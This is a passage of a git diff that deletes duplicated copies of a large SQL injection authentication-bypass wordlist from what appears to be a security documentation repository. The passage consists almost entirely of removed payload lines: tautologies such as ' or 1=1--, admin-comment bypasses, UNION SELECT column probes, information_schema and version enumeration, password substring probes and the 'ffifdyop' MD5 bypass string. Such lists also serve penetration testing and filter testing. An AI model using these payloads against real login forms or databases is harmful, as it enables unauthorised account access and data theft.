-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
